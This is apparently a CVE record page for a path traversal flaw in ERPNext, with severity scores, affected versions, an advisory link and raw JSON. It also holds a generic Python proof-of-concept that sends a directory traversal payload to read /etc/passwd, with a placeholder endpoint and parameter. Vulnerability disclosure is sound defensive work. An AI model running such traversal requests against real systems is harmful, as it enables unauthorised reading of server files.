Security Vulnerability Report
CVE-2026-44440 CVSS 6.5 MEDIUM

CVE-2026-44440

Published: 2026-05-13 22:16:45
Last Modified: 2026-05-14 20:11:21

Description

ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.101.1 and 16.10.0, an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability on an endpoint allows an authenticated adjacent attacker to read arbitrary files. This vulnerability is fixed in 15.101.1 and 16.10.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N (Secondary source; attack vector NETWORK)
CVSS Vector (Primary source)
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N (score 5.7, MEDIUM; attack vector ADJACENT_NETWORK, consistent with the "authenticated adjacent attacker" wording of the description)
Weakness
CWE-22 (Improper Limitation of a Pathname to a Restricted Directory, 'Path Traversal')

Configurations (Affected Products)

cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:* (versionEndExcluding 15.101.1) - VULNERABLE
cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:* (versionStartIncluding 16.0.0, versionEndExcluding 16.10.0) - VULNERABLE
ERPNext < 15.101.1
ERPNext >= 16.0.0, < 16.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (example). The endpoint path and the query parameter name below
# are placeholders: the advisory text on this page does not name the
# affected endpoint or its parameter.
target_url = "http://target-ip:8000/api/method/endpoint"

# Authenticated session cookies (required): the issue needs a valid login
cookies = {"sid": "your_session_id_here"}

# Payload attempting to read /etc/passwd via directory traversal
payload = {"path": "../../../../../../etc/passwd"}

try:
    response = requests.get(target_url, params=payload, cookies=cookies, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit successful!")
        print(response.text)
    else:
        print(f"[-] Failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

References

https://github.com/frappe/erpnext/security/advisories/GHSA-6ffr-92hr-3394 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-44440",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T22:16:45.007",
    "lastModified": "2026-05-14T20:11:20.710",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.101.1 and 16.10.0, an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability on an endpoint allows an authenticated adjacent attacker to read arbitrary files. This vulnerability is fixed in 15.101.1 and 16.10.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 5.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "15.101.1",
                "matchCriteriaId": "59064A28-5E17-4A60-8D27-DCF494639CBB"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:frappe:erpnext:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "16.0.0",
                "versionEndExcluding": "16.10.0",
                "matchCriteriaId": "00CBBCD6-73CB-4BE3-BE70-0B75E9F4105F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/frappe/erpnext/security/advisories/GHSA-6ffr-92hr-3394",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}